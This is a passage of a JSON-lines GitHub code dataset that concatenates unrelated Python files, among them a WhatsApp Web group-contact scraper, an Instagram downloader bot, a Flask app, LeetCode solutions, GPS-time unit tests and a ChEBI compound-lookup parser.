2)\n\n\nplot_approximation_deviation(\n approximation,\n analytically,\n xlabel=\"$t$\", ylabel=\"$z$\",\n title=\"Difference to analytical solution\",\n dir_path=fig_dir_path,\n show=False\n)\n\n\ndef calculate_accuracy(approximation):\n # evaluate accuracy\n x_space = np.linspace(0, 1, 100)\n y_space = np.linspace(-1, 1, 100)\n z_space = [math.fabs(approximation.use(x, y) - analytically(x, y)) for x in x_space for y in y_space]\n\n print(\"min accuracy: \" + str(min(z_space)))\n print(\"max accuracy: \" + str(max(z_space)))\n\n accuracy = sum(z_space) / len(z_space)\n print(\"accuracy: \" + str(accuracy))\n return accuracy\n\n\ncalculate_accuracy(approximation)","repo_name":"yorickreum/approximator","sub_path":"examples/heat/results-thesis/example-run/show_heat.py","file_name":"show_heat.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27396362172","text":"from tkinter import *\nimport csv\nfrom threading import *\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom tkinter import *\nimport time\nimport tkinter.messagebox\nfrom selenium import webdriver\nfrom tkinter import ttk\n\n\n\ndef threading():\n t1=Thread(target=printel)\n t1.start()\n\n\ndef group_contact(target_text):\n\n try:\n frame = Frame(window, width=350, height=480, bg=\"white\")\n frame.place(x=440, y=456)\n p = ttk.Progressbar(frame, orient='horizontal', mode='indeterminate', length=300)\n p.grid(column=0, row=0, columnspan=2, padx=20, pady=20)\n p.start()\n rb_results = []\n time.sleep(5)\n elm = WebDriverWait(driver, 70000).until(\n EC.visibility_of_element_located((By.XPATH, '//*[@id=\"main\"]/header/div[2]/div[2]/span'))).text\n\n if elm == \"click here for contact info\" or elm == None:\n rb_results.append(\"0\")\n print(\"end\")\n\n else:\n rb_results.append(elm)\n print(\"go on...\")\n\n with open(\"group_contact/rb_results.csv\", \"w\", newline='') as resultFile:\n print(\"process go on \")\n writer = csv.DictWriter(resultFile, fieldnames=[\"Rb Results\"], delimiter=',')\n writer.writeheader()\n writer.writerows({'Rb Results': item} for item in rb_results)\n resultFile.close()\n df = pd.read_csv(\"group_contact/rb_results.csv\")\n rf = df.loc[0, 'Rb Results']\n rf = rf.replace(\",\", \"\\n\")\n x = rf.split(\"\\n\")\n rf = ''\n im = 1\n for el in x:\n if (el.startswith(' +')):\n rf = rf + str(target_text) + str(im) + \",* myContacts,\" + str(el) + \"\\n\"\n im = im + 1\n f = open('group_contact/' + target_text + '.csv', 'w', encoding=\"utf-8\")\n f.write(\"Name,Group Membership,Phone 1 - Value\\n\")\n f.write(rf)\n f.close()\n if rb_results != \"0\" or len(rb_results) != 0:\n p.stop()\n frame.destroy()\n tkinter.messagebox.showinfo(\"Success!!\",\n \"Number is saved in group contact file and the file name is same as your typed name\")\n except:\n pass\n\n\ndef printel():\n target = entry0.get()\n print(\"go on....\")\n time.sleep(5)\n group_contact(target)\n\n\n\n\noptions = webdriver.ChromeOptions()\ndriver = webdriver.Chrome(executable_path=r'.\\driver\\chromedriver.exe')\ndriver.get(\"https://web.whatsapp.com/\")\nwait = WebDriverWait(driver, 300)\nwindow = Tk()\nwindow.title('Vraag Whatsapp Scrapper')\nwindow.geometry(\"820x526\")\nwindow.configure(bg = \"#ffffff\")\ncanvas = Canvas(\n window,\n bg = \"#ffffff\",\n height = 526,\n width = 820,\n bd = 0,\n highlightthickness = 0,\n relief = \"ridge\")\ncanvas.place(x = 0, y = 0)\n\nbackground_img = PhotoImage(file = f\"media/w_background.png\")\nbackground = canvas.create_image(\n 418, 264,\n image=background_img)\n\nimg0 = PhotoImage(file = f\"media/w_img0.png\")\nb0 = Button(\n image = img0,\n borderwidth = 0,\n highlightthickness = 0,\n command = threading,\n relief = \"flat\")\n\nb0.place(\n x = 485, y = 330,\n width = 292,\n height = 50)\n\nentry0_img = PhotoImage(file = f\"media/w_img_textBox0.png\")\nentry0_bg = canvas.create_image(\n 630, 268,\n image = entry0_img)\n\nentry0 = Entry(\n bd = 0,\n bg = \"#a6a1cc\",\n highlightthickness = 0)\n\nentry0.place(\n x = 500, y = 250,\n width = 240.0,\n height = 36)\n\ncanvas.create_text(\n 590, 238,\n text = \"ENTER CSV FILE NAME\",\n fill = \"#000000\",\n font = (\"Anybody-Bold\", int(13.0)))\n\nwindow.resizable(False, False)\nwindow.mainloop()\n","repo_name":"Vraag0056/Social-Media-Scrapper-Python","sub_path":"whatsapp.py","file_name":"whatsapp.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32474310143","text":"from flask import Flask, request, render_template\nfrom cohesion import *\nfrom drinks_backend import *\n\napp = Flask(__name__)\nthe_data = [' ']\n\n@app.route(\"/\", methods = ['GET','POST'])\ndef hello_world():\n if request.method == \"POST\":\n #print (request.form.get(\"str\"))\n the_data.append(request.form.get(\"str\"))\n #print(the_data)\n\n return render_template(\"Main.html\")\n\n@app.route(\"/page\")\ndef page2():\n return render_template(\"Page2.html\", data = the_data)\n\n\n\n\n\n@app.route(\"/new\")\ndef demo():\n a_list = classify(the_data[-1])\n\n print(a_list[-1])\n return render_template(\"Search.html\", data = a_list )","repo_name":"ThunderRoar/Brewing-Borders-UofT-Hacks-X","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2884643784","text":"import __sub__\nfrom getRatesDatabase import *\nfrom inputSymbols import getSymbols\nimport csv\nfrom dbOperations import getConnection\n\nclient, db = getConnection()\nnameFile = f\"Extracted (Date Min) - {str(datetime.now().timestamp()).replace('.','')}\"\nsymbols = getSymbols()\nf_date_start = FirstDate(2021,4,18)\nf_date_end = LastDate(2022,4,20)\n\nwith open(f'extracteds/{nameFile}.csv', mode='w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['Ativo', 'Qtd Registros', 'Horario Minima', 'Ocorrencias'])\n \n for i, symbol in enumerate(symbols):\n datas = getTimesMin(db, symbol, f_date_start, f_date_end)\n qty_datas = len(datas)\n\n if qty_datas <= 0: continue\n\n count_dates = {}\n\n for data in datas:\n time_min = data['time']\n str_date = f\"{time_min.hour}:{time_min.minute}\"\n\n if(str_date in count_dates):\n count_dates[str_date] += 1 \n else: \n count_dates[str_date] = 1\n \n tmp_i = list(count_dates.keys())[0]\n tmp_v = list(count_dates.values())[0]\n\n for ind, val in count_dates.items():\n if val > tmp_v:\n tmp_i = ind\n tmp_v = val\n\n writer.writerow([symbol, qty_datas, tmp_i, tmp_v])\n print('Concluído: {:.2f}%'.format((i+1) / len(symbols) * 100))\n\nclient.close()\nprint(\"Ready!\")\n","repo_name":"gilsonmeira97/Stock-Trading-Controller","sub_path":"strategies/horarioMinimas_1.py","file_name":"horarioMinimas_1.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6345431042","text":"class Solution:\n # @param A : string\n # @return an integer\n def numDecodings(self, A):\n n=len(A)\n if n==1:\n if A=='0':\n return 0\n return 1\n if A[0]=='0':\n return 0\n dp=[0]*(n+1)\n dp[0]=1\n dp[1]=1\n for i in range(2,n+1):\n if A[i-1]=='0':\n if A[i-1-1]>'2':\n return 0\n if A[i-1]!='0':\n dp[i]+=dp[i-1]\n num = int(A[i-1-1] + A[i-1])\n if num<=26 and A[i-2]!='0':\n dp[i]+=dp[i-2]\n return dp[n]","repo_name":"akazuko/CompCoding","sub_path":"Interview Bit/DynamicProgramming/waysToDecode.py","file_name":"waysToDecode.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"31346008592","text":"from aiogram.types import Message, ReplyKeyboardRemove, MediaGroup\nfrom aiogram.dispatcher.filters import Command\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import ChatActions\nfrom loader import dp, db\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom fake_useragent import UserAgent\nimport requests\nfrom aiogram.dispatcher.filters import Text\nimport os\nimport time\nfrom io import BytesIO\n\n@dp.message_handler(Text(contains='https://www.instagram.com',ignore_case=True))\nasync def handle_instagram_post(message: Message, state: FSMContext):\n await message.answer(\"Video yuklanmoqda iltimos biroz kuting\")\n options = webdriver.ChromeOptions()\n options.add_argument(f'user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36')\n # options.add_argument('--headless')\n driver = webdriver.Chrome(options=options)\n driver.get('https://snapinsta.app/')\n input = driver.find_element(By.XPATH,'//*[@id=\"url\"]')\n input.send_keys(message.text)\n time.sleep(0.5)\n driver.find_element(By.XPATH,'//*[@id=\"downloader\"]/form/button').click()\n time.sleep(3)\n div_elements = driver.find_elements(By.CLASS_NAME,'download-bottom')\n print(len(div_elements))\n\n hrefs_dict = {}\n for div_element in range(len(div_elements)):\n a_tag = div_elements[div_element].find_element(By.TAG_NAME, 'a')\n text = a_tag.text\n href = a_tag.get_attribute('href')\n hrefs_dict[text] = href\n print(len(hrefs_dict))\n\n # if len(hrefs_dict) == 1:\n # buffer = BytesIO()\n # res = requests.get(hrefs_dict[list(hrefs_dict.keys())[0]])\n\n # buffer.write(res.content)\n # buffer.seek(0)\n # if list(hrefs_dict.keys())[0] == \"Download Video\":\n # await message.answer_video(buffer)\n # else:\n # await message.answer_photo(buffer)\n\n # else:\n path = 'D:/Programming projects/Telegram bots/yuklabot/media/instagram'\n album = MediaGroup()\n for text, href in hrefs_dict.items():\n print(f\"{href}\\n\\n\")\n buffer = BytesIO()\n res = requests.get(href)\n buffer.write(res.content)\n buffer.seek(0)\n if \"Download Video\" in text:\n album.attach_video(buffer)\n else:\n album.attach_photo(buffer)\n await message.answer_media_group(album)\n driver.quit()\n","repo_name":"Xazratbek/TelegramBots","sub_path":"yuklabot/handlers/users/instagram.py","file_name":"instagram.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10816232561","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution(object):\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n dummy = ListNode()\n r, p, q = dummy, l1, l2\n while p and q:\n if p.val <= q.val:\n r.next = ListNode(p.val)\n r, p = r.next, p.next\n else:\n r.next = ListNode(q.val)\n r, q = r.next, q.next\n if p:\n r.next = p\n if q:\n r.next = q\n return dummy.next\n","repo_name":"jia0713/leetcode","sub_path":"001-100/021-Merge Two Sorted Lists.py","file_name":"021-Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"70345501220","text":"import contextlib\nimport io\nimport os\nimport tempfile\nimport unittest\nfrom typing import List\n\nimport numpy as np\n\nfrom quantumdataset import QuantumDataset\nfrom quantumdataset.externals.serialization import Serializer\n\n\nclass TestQuantumDataset(unittest.TestCase):\n def setUp(self):\n datadir = os.environ.get(\"QUANTUM_DATASET_TEST_DIR\")\n if datadir is None:\n datadir = tempfile.mkdtemp()\n self.qd = QuantumDataset(datadir)\n\n def test_check_quantum_dataset_installation(self):\n\n with tempfile.TemporaryDirectory() as tmpdir:\n result = QuantumDataset.check_quantum_dataset_installation(tmpdir)\n self.assertIsNone(result)\n\n def test_list_tags(self):\n tags = self.qd.list_tags()\n self.assertIsInstance(tags, List)\n\n subtags = self.qd.list_subtags(\"allxy\")\n self.assertIsInstance(subtags, list)\n\n def test_load_dataset(self):\n ds = self.qd.load_dataset(\"time_rabi\", 0)\n self.assertTrue(ds is not None)\n\n def test_show_data(self):\n with contextlib.redirect_stdout(io.StringIO()) as s:\n self.qd.show_data()\n self.assertIn(\"tag allxy\", s.getvalue())\n\n def test_database_metadata(self):\n m = self.qd.database_metadata()\n self.assertIsInstance(m, list)\n\n self.assertIsInstance(m[0].tag, str)\n\n def test_Serializer(self):\n s = Serializer()\n e = s.encode_data({\"1\": 1, \"a\": np.array([1, 2])})\n self.assertIsInstance(e, dict)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"QuTech-Delft/quantum_dataset","sub_path":"quantumdataset/tests/test_quantum_dataset.py","file_name":"test_quantum_dataset.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"36597335012","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import manifold\n\nimport params\nfrom nn.mikolov_sg import MikolovBiSG\nimport dal.dal_mikolov_bi_sg as dal\n\ndef vis(e):\n model = torch.load(f'./../results/MikolovBiSG_w5_d100_v81272lr0.01_b5000_e{e}.ptc')\n mikolovbisg = MikolovBiSG(model['params'])\n mikolovbisg.load_state_dict(model['state'])\n\n tsne = manifold.TSNE(n_components=2, init='random', random_state=0, perplexity=10)\n Y = tsne.fit_transform(mikolovbisg.W_I.weight.detach().numpy().transpose())\n plt.scatter(Y[:, 0], Y[:, 1])\n\ndef topn(source, e):\n ##load an existing model\n model = torch.load(f'./../results/MikolovBiSG_w5_d100_v81272lr0.01_b5000_e{e}.ptc')\n mikolovbisg = MikolovBiSG(model['params'])\n mikolovbisg.load_state_dict(model['state'])\n vocabs = dal.load_vocabs()\n\n s_idx = vocabs.index(source)\n s_v = torch.zeros(1, len(vocabs))\n s_v[0, s_idx] = 1\n s_t = mikolovbisg.forward(s_v)#softmax(WI * WO)\n probs, predictions = s_t.topk(10, dim=1)\n # print(mikolovbisg.W_I.weight[:,s_idx], mikolovbisg.W_O.weight[s_idx, :])\n # print(mikolovbisg.W_I.weight[:,predictions[0][0]], mikolovbisg.W_O.weight[predictions[0][0], :])\n print(f'{source}:{([vocabs[t_idx] for t_idx in predictions[0]])}')\n\nfor e in range(0, 31, 5):\n topn('korea', e)\n\n#vis(20)","repo_name":"hosseinfani/learning_nn","sub_path":"2013MikolovWV/src/peek_wv.py","file_name":"peek_wv.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1312984305","text":"import asyncio\nfrom datetime import datetime\nfrom unittest import mock\n\nfrom ovshell import api, testing\nfrom ovshell_core import gpstime\n\n\nasync def test_clock_indicator(\n ovshell: testing.OpenVarioShellStub, monkeypatch\n) -> None:\n # GIVEN\n datetime_mock = mock.Mock()\n datetime_mock.utcnow.return_value = datetime(2020, 6, 2, 12, 32, 54)\n monkeypatch.setattr(\"ovshell_core.gpstime.datetime\", datetime_mock)\n monkeypatch.setattr(\"ovshell_core.gpstime.CLOCK_POLL_INTERVAL\", 0.01)\n state = gpstime.GPSTimeState()\n\n # WHEN\n task = asyncio.create_task(gpstime.clock_indicator(ovshell.screen, state))\n await asyncio.sleep(0)\n\n clockind = ovshell.screen.stub_get_indicator(\"clock\")\n assert clockind is not None\n assert clockind.markup == (\"ind error\", \"12:32 UTC\")\n assert clockind.location == api.IndicatorLocation.LEFT\n\n state.acquired = True\n await asyncio.sleep(0.02)\n clockind = ovshell.screen.stub_get_indicator(\"clock\")\n assert clockind is not None\n assert clockind.markup == (\"ind normal\", \"12:32 UTC\")\n assert clockind.location == api.IndicatorLocation.LEFT\n\n task.cancel()\n\n\nasync def test_gps_time_sync(ovshell: testing.OpenVarioShellStub, monkeypatch) -> None:\n # GIVEN\n subpr_mock = mock.Mock()\n monkeypatch.setattr(\"ovshell_core.gpstime.subprocess\", subpr_mock)\n\n gprmc_fields = \"225446,A,4916.45,N,12311.12,W,000.5,054.7,191194,020.3\"\n ovshell.devices.stub_add_nmea(\n [\n api.NMEA(\"\", \"\", \"ZZZ\", []),\n api.NMEA(\"\", \"\", \"GPRMC\", gprmc_fields.split(\",\")),\n api.NMEA(\"\", \"\", \"AAA\", []),\n ]\n )\n state = gpstime.GPSTimeState()\n\n # WHEN\n await gpstime.gps_time_sync(ovshell, state)\n\n # THEN\n assert state.acquired is True\n datebin = ovshell.os.path(\"//bin/date\")\n subpr_mock.run.assert_called_with(\n [datebin, \"+%F %H:%M:%S\", \"-s\", \"1994-11-19 22:54:46\"],\n check=True,\n capture_output=True,\n )\n\n\ndef test_parse_gps_datetime_correct() -> None:\n # GIVEN\n gprmc_fields = \"225446,A,4916.45,N,12311.12,W,000.5,054.7,191103,020.3\"\n nmea = api.NMEA(\"\", \"\", \"GPRMC\", gprmc_fields.split(\",\"))\n\n # WHEN\n dt = gpstime.parse_gps_datetime(nmea)\n\n # THEN\n assert dt == datetime(2003, 11, 19, 22, 54, 46)\n\n\ndef test_parse_gps_datetime_longtime() -> None:\n gprmc_fields = \"121931.00,A,4801.86153,N,01056.69289,E,53.587,8.64,270520,,,A\"\n nmea = api.NMEA(\"\", \"\", \"GPRMC\", gprmc_fields.split(\",\"))\n\n # WHEN\n dt = gpstime.parse_gps_datetime(nmea)\n\n # THEN\n assert dt == datetime(2020, 5, 27, 12, 19, 31)\n\n\ndef test_parse_gps_datetime_bad_sentence() -> None:\n # GIVEN\n gprmc_fields = \"225446,A,4916.45,N,12311.12,W,000.5,054.7,191194,020.3\"\n nmea = api.NMEA(\"\", \"\", \"XXXXX\", gprmc_fields.split(\",\"))\n\n # WHEN\n dt = gpstime.parse_gps_datetime(nmea)\n\n # THEN\n assert dt is None\n\n\ndef test_parse_gps_datetime_notime() -> None:\n # GIVEN\n gprmc_fields = \",,,,,,,,,\"\n nmea = api.NMEA(\"\", \"\", \"GPRMC\", gprmc_fields.split(\",\"))\n\n # WHEN\n dt = gpstime.parse_gps_datetime(nmea)\n\n # THEN\n assert dt is None\n\n\ndef test_set_system_time_tolerable_offset() -> None:\n newtime = datetime(2020, 5, 29, 1, 1, 2)\n now = datetime(2020, 5, 29, 1, 1, 1)\n assert gpstime.set_system_time(newtime, now) is False\n\n\ndef test_set_system_time_now(monkeypatch) -> None:\n # GIVEN\n subpr_mock = mock.Mock()\n monkeypatch.setattr(\"ovshell_core.gpstime.subprocess\", subpr_mock)\n newtime = datetime(2003, 5, 29, 1, 1, 1)\n\n # WHEN, THEN\n assert gpstime.set_system_time(newtime) is True\n subpr_mock.run.assert_called_with(\n [\"date\", \"+%F %H:%M:%S\", \"-s\", \"2003-05-29 01:01:01\"],\n check=True,\n capture_output=True,\n )\n","repo_name":"kedder/openvario-shell","sub_path":"tests/ovshell_core_tests/test_gpstime.py","file_name":"test_gpstime.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"38056294171","text":"\"\"\"\nNaming helpers (e.g. snakecase, kebabcase, ... pluralize, singularize)\n\"\"\"\nimport re\nimport inflection\nfrom kamidana import as_filter\n\npluralize = as_filter(inflection.pluralize)\nsingularize = as_filter(inflection.singularize)\n\n\n@as_filter\ndef snakecase(\n name,\n rx0=re.compile(\"(.)([A-Z][a-z]+)\"),\n rx1=re.compile(\"([a-z0-9])([A-Z])\"),\n rx2=re.compile(\"[A-Z]+\"),\n separator=\"_\",\n from_separator=\"-\",\n):\n if from_separator in name:\n if rx2.search(name) is None:\n return name.replace(from_separator, separator)\n else:\n return separator.join(\n snakecase(x, separator=separator, from_separator=from_separator)\n for x in name.split(from_separator)\n )\n m = rx2.match(name)\n if m is not None:\n i = m.end()\n return separator.join(\n [\n name[:i].lower(),\n snakecase(name[i:], separator=separator, from_separator=from_separator),\n ]\n )\n else:\n pattern = r\"\\1{}\\2\".format(separator)\n return rx1.sub(pattern, rx0.sub(pattern, name)).lower()\n\n\n@as_filter\ndef kebabcase(name):\n return snakecase(name, separator=\"-\", from_separator=\"_\")\n\n\n@as_filter\ndef lispcase(name): # alias\n return snakecase(name, separator=\"-\", from_separator=\"_\")\n\n\n@as_filter\ndef camelcase(name):\n return untitleize(pascalcase(name))\n\n\n@as_filter\ndef pascalcase(name, rx=re.compile(r\"[\\-_ ]\")):\n return \"\".join(titleize(x) for x in rx.split(name))\n\n\n@as_filter\ndef titleize(name):\n if not name:\n return name\n name = str(name)\n return \"{}{}\".format(name[0].upper(), name[1:])\n\n\n@as_filter\ndef untitleize(name):\n if not name:\n return name\n return \"{}{}\".format(name[0].lower(), name[1:])\n","repo_name":"podhmo/kamidana","sub_path":"kamidana/additionals/naming.py","file_name":"naming.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"4309087555","text":"import socket\n\n\nif __name__ == \"__main__\":\n host = \"127.0.0.1\"\n port = 4455\n server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n server.bind((host, port))\n while True:\n data, addr = server.recvfrom(1024)\n data = data.decode(\"utf-8\")\n if data == \"exit\":\n print(\"Client disconnected.\")\n break\n key,addr = server.recvfrom(1024)\n key = key.decode(\"utf-8\")\n print(data)\n print(key)\n \n\n \n data = data.encode(\"utf-8\")\n server.sendto(data, addr)\n \n server.close()","repo_name":"rahulkumarroy477/socket-programming","sub_path":"udp/crc_server.py","file_name":"crc_server.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72002708900","text":"# 589. N-ary Tree Preorder Traversal\n\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def preorder(self, root: 'Node') -> List[int]:\n values = []\n def dfs(root: 'Node'):\n nonlocal values\n if root:\n values.append(root.val)\n if root.children != []:\n for child in root.children:\n dfs(child)\n \n dfs(root)\n \n return values","repo_name":"YukiT1990/Leetcode","sub_path":"00204_N-aryTreePreorderTraversal(589).py","file_name":"00204_N-aryTreePreorderTraversal(589).py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36496632169","text":"from __future__ import print_function\nfrom builtins import str\nfrom builtins import object\nimport pdb\nimport socket\nimport xml.dom.minidom\n\nimport metmask.query as query\nfrom metmask.mask import mask\n\nsocket.setdefaulttimeout(5)\n\n\nclass chebiParser(object):\n def __init__(self, parent):\n self.getComplete = 'http://www.ebi.ac.uk/webservices/chebi/test/getCompleteEntity?'\n self.getLite = 'http://www.ebi.ac.uk/webservices/chebi/test/getLiteEntity?'\n self.getOntologyChildren = 'http://www.ebi.ac.uk/webservices/chebi/test/getOntologyChildren?'\n self.queryTables = ['chebi', 'iupac', 'cas', 'kegg', 'inchi', 'smiles', 'formula', 'synonym']\n self.parent = parent\n\n def url2ids(self, url):\n \"\"\"\n take an url, get the chebi ids\n \"\"\"\n qRes = self.parent.getUrl(url)\n if qRes:\n searchResults = xml.dom.minidom.parse(qRes)\n ids = list(query.nodecontents(searchResults.getElementsByTagName('ns1:chebiId')))\n return [x.replace('CHEBI:', '') for x in ids]\n else:\n return []\n\n def getChebiChildren(self, chebiId):\n \"\"\" get the is_enantiomer children \n \"\"\"\n url = self.getOntologyChildren + \"chebiId=\" + chebiId\n qRes = self.parent.getUrl(url)\n if not qRes:\n return ([])\n searchResults = xml.dom.minidom.parse(qRes)\n res = []\n for it in searchResults.getElementsByTagName('ns1:ListElement'):\n type = list(query.nodecontents(it.getElementsByTagName(\"ns1:type\")))\n if type[0] == 'is enantiomer of':\n child = list(query.nodecontents(it.getElementsByTagName(\"ns1:chebiId\")))\n res.append(child[0].replace(\"CHEBI:\", \"\"))\n return (res)\n\n def getChebiMasks(self, un, mm):\n \"\"\"\n 1. use getLite to query for all relevant entries in the mask\n 2. Query for chebi, iupac, cas, kegg, inchi, smiles\n 1. Get only exact matches\n 3. Take the unique ones\n 4. Get all is_a children of the found chebis and add them\n Result is a list of masks\n \"\"\"\n res = {}\n # pdb.set_trace()\n tmpmask = mask({}, mm.idpatterns)\n if not any([x in self.queryTables for x in un.getTables()]):\n return (res)\n if un.hasTable('chebi'):\n for ch in un.getIdentifiers('chebi'):\n res[ch] = self.chebi2mask(mm, ch)\n tmpmask.merge(res[ch])\n\n def filteredids(table, un, tmpmask):\n identifiers = []\n if un.hasTable(table):\n identifiers = un.getIdentifiers(table)\n if tmpmask.hasTable(table):\n # to start querying for the same identifiers several times\n identifiers = [x for x in identifiers if x not in tmpmask.getIdentifiers(table)]\n return (identifiers)\n\n def fillresandmerge(qUrl, tmpmask, res):\n newids = self.url2ids(qUrl)\n for ch in newids:\n if ch not in res:\n res[ch] = self.chebi2mask(mm, ch)\n tmpmask.merge(res[ch])\n\n for ide in filteredids('iupac', un, tmpmask):\n qUrl = self.getLite + \"search=\" + \\\n self.parent.urlSafe(ide) + \"&searchCategory=IUPAC+NAME\"\n fillresandmerge(qUrl, tmpmask, res)\n\n for ide in filteredids('cas', un, tmpmask):\n qUrl = self.getLite + \"search=\" + \\\n self.parent.urlSafe(ide) + \"&searchCategory=REGISTRY+NUMBER\"\n fillresandmerge(qUrl, tmpmask, res)\n\n for ide in filteredids('kegg', un, tmpmask):\n qUrl = self.getLite + \"search=\" + \\\n self.parent.urlSafe(ide) + \"&searchCategory=DATABASE+LINK\"\n fillresandmerge(qUrl, tmpmask, res)\n\n for ide in filteredids('inchi', un, tmpmask):\n qUrl = self.getLite + \"search=\" + \\\n self.parent.urlSafe(ide) + \"&searchCategory=INCHI\"\n fillresandmerge(qUrl, tmpmask, res)\n\n for ide in filteredids('smiles', un, tmpmask):\n qUrl = self.getLite + \"search=\" + \\\n self.parent.urlSafe(ide) + \"&searchCategory=SMILES\"\n fillresandmerge(qUrl, tmpmask, res)\n\n foundIds = list(res.keys())\n children = []\n for ch in foundIds:\n children = self.getChebiChildren(ch)\n for child in children:\n if child not in res:\n res[child] = self.chebi2mask(mm, child)\n return (res)\n\n def chebi2mask(self, mm, chebiId):\n \"\"\"\n get a mask containing the info associated with a chebi id\n 2. use getComplete to fetch the contents of the relevant entries\n \"\"\"\n ba = chebiId\n un = mask({}, mm.idpatterns)\n qUrl = self.getComplete + \"chebiId=\" + str(chebiId)\n qRes = self.parent.getUrl(qUrl)\n if not qRes:\n return (mask({}))\n searchResults = xml.dom.minidom.parse(qRes)\n if not searchResults:\n return (mask({}))\n if searchResults.getElementsByTagName('ns1:return'):\n retList = searchResults.getElementsByTagName('ns1:return')[0]\n # found non-existent chebiId\n else:\n # this would have been reasonable but chebi has problems so that some\n # entries exist, but cant be fetched. valid chebi but we cant query\n # for it,\n # hence, skip completely\n # delmask = mask({})\n # delmask.append('chebi', chebiId)\n # mm.brandish(delmask)\n return (mask({}))\n # chebiid\n if retList.getElementsByTagName(\"ns1:chebiId\"):\n chebiId = list(query.nodecontents(retList.getElementsByTagName(\"ns1:chebiId\")))[0]\n un.append('chebi', chebiId.replace(\"CHEBI:\", \"\"),\n self.parent.confid, self.parent.sourceid)\n\n # smiles\n if retList.getElementsByTagName(\"ns1:smiles\"):\n un.append('smiles', list(query.nodecontents(retList.getElementsByTagName(\"ns1:smiles\")))[0],\n self.parent.confid, self.parent.sourceid)\n\n # synonym\n if searchResults.getElementsByTagName('ns1:Synonyms'):\n syns = searchResults.getElementsByTagName('ns1:Synonyms')[0]\n for sy in list(query.nodecontents(syns.getElementsByTagName(\"ns1:data\"))):\n un.append('synonym', sy, self.parent.mm.confidence['weak'], \\\n self.parent.sourceid)\n\n # inchi\n if retList.getElementsByTagName(\"ns1:inchi\"):\n un.append('inchi', list(query.nodecontents(retList.getElementsByTagName(\"ns1:inchi\")))[0],\n self.parent.confid, self.parent.sourceid)\n\n # iupac\n if searchResults.getElementsByTagName('ns1:IupacNames'):\n syns = searchResults.getElementsByTagName('ns1:IupacNames')[0]\n for sy in list(query.nodecontents(syns.getElementsByTagName(\"ns1:data\"))):\n un.append('iupac', sy, self.parent.confid, \\\n self.parent.sourceid)\n\n # kegg\n for ll in searchResults.getElementsByTagName('ns1:DatabaseLinks'):\n if list(query.nodecontents(ll.getElementsByTagName(\"ns1:type\")))[0] == 'KEGG COMPOUND accession':\n for sy in list(query.nodecontents(ll.getElementsByTagName(\"ns1:data\"))):\n un.append('kegg', sy, self.parent.confid, self.parent.sourceid)\n\n # cas\n for ll in searchResults.getElementsByTagName('ns1:RegistryNumbers'):\n if list(query.nodecontents(ll.getElementsByTagName(\"ns1:type\")))[0] == 'CAS Registry Number':\n for sy in list(query.nodecontents(ll.getElementsByTagName(\"ns1:data\"))):\n un.append('cas', sy, self.parent.confid, self.parent.sourceid)\n\n # pdb.set_trace()\n # formula\n if searchResults.getElementsByTagName('ns1:Formulae'):\n form = searchResults.getElementsByTagName('ns1:Formulae')[0]\n for sy in list(query.nodecontents(form.getElementsByTagName(\"ns1:data\"))):\n un.append('formula', sy, self.parent.mm.confidence['weak'], \\\n self.parent.sourceid)\n\n return (un)\n\n\nclass parser(object):\n def __init__(self, parent):\n self.chebip = chebiParser(parent)\n parent.tables = self.chebip.queryTables\n self.parent = parent\n if not parent.boost:\n parent.boost = True\n parent.master = 'chebi'\n\n def process(self):\n ll = True\n self.parent.mm.setTableWeak('formula')\n\n while ll:\n ll = self.parent.getLine()\n if not ll:\n break\n tmp = mask({})\n tmp.append('_id', 